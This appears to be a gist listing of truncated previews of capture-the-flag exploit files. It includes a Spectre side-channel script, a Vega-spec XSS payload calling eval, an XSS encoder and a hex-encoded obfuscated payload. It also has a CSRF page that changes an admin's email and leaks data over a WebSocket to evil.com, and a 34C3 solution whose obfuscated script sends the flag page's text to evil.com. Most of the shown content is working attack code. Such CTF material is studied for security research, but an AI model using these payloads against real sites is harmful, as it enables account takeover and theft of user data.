View spectre.js
const PAGE_SZ = 4096; | |
const CACHE_LINE_SZ = 64; | |
const CACHE_LINES_PER_PAGE = PAGE_SZ/CACHE_LINE_SZ; | |
const CACHE_WAYS = 8; | |
const MEM_PAGES = 8192; | |
const WASM = false; | |
class Utils { | |
sort(arr) { | |
for (let i = 0; i < arr.length; i++) { |
View writeup.txt
### Pwn! | |
```vega | |
{ | |
"data": { | |
"values": [{}] | |
}, | |
"transform": [ | |
{"filter": "(0//1/)-'\\\n,eval(payload.dataset.x))))//'"} | |
], | |
"mark": "bar" |
View source.js
const fs = require('fs'); | |
const express = require('express'); | |
const session = require('express-session') | |
const cookieParser = require('cookie-parser'); | |
const { URL } = require('url'); | |
const uuidv4 = require('uuid/v4'); | |
const path = require('path'); | |
const bot = require('./bot'); | |
const crypto = require('crypto'); | |
const mariadb = require('mariadb'); |
View js-lower-alpha-parent-dot.html
<style> | |
textarea { | |
width: 100%; | |
height: 30%; | |
} | |
</style> | |
<textarea id="input">alert('xss')</textarea> | |
<textarea id="output"></textarea> | |
<br> | |
<label>Length: </label><span id="numchars"></span> |
View output.log
[+] Server is listening on 5001 | |
...pre-payoad: | |
...post-payoad: | |
...pre-payoad: d | |
...post-payoad: 3 | |
...pre-payoad: d3 | |
...post-payoad: d3 | |
...pre-payoad: d3a | |
...post-payoad: 0d3 | |
...pre-payoad: d3ad |
View index.html
<!doctype html> | |
<meta charset=utf-8> | |
<script> | |
(function(){ | |
let p = '66756e6374696f6e20776f6c6f6c6f2829207b0a2f2a2070616464696e6770616464696e6770616464696e6770616464696e202a2f0a6c65742078203d205b60a93b8c71cd270612671823b651adad9cdb3cd1d746c54f2911be40d107cc15e790e1a8be804d36484bcee114fe8f137bb71fb709c1a16d399884facf5936714b1fe4c9be4e2ec593c1df6e22d6ee0fc42198160b689c02f9a9c300c89b5f68c8d33530f89fc8721efb41cc3adc73008702d7c7373b70cbb75ae7575a6f7df566602c2f2a666a35374e4762304954714678656e6c6f374644766e41775a47464e346f6e4538535274443134766e3564776d79424b546d56496c6c4c706b4d2a2f6000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005752ca3581b494dd996d5ddeab432a3bfb53bbcdb05dd34401241f1cf273e3c9812ecd67c66f2fb8f046e3cc1f5787921df10fc8423f626c6bef6f09947df69992d2ba0431422fbcc26dcdd16e4b6cbf198c3a5b12fa72b066932264a9afdbc8da7ba363f8ea1c70267c50992d0c9dee41000116dc523f4e61c37e208a9cf34602c2f2a39697a366c534166596d46786a48446e375246446e353875544 |
View index.html
<body> | |
<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST"> | |
// change admin's email | |
<input type="text" name="email" value="wololo@coolmail.com"> | |
<input type="text" name="csrf" value=""> | |
<input type="text" name="change" value="Modify profile"> | |
</form> | |
<iframe id="leakchar"></iframe> | |
<script> | |
const WS = "ws://evil.com:8000"; |
View solution.html
XSS vector: | |
<link id=foo rel=import href=/flag(1|2)> | |
<script src="/feed?type=jsonp&cb=payload"></script> | |
<!-- superblog 1 - flag: 34C3_so_y0u_w3nt_4nd_learned_SOME_javascript_g00d_f0r_y0u --> | |
<script> | |
document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random``}${`_`}${escape.call`${document.getElementsByTagName`link`.item``.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join``}`, | |
</script> | |
<!-- superblog 2 - flag: 34C3_h3ncef0rth_peopl3_sh4ll_refer_t0_y0u_only_4s_th3_ES6+DOM_guru --> |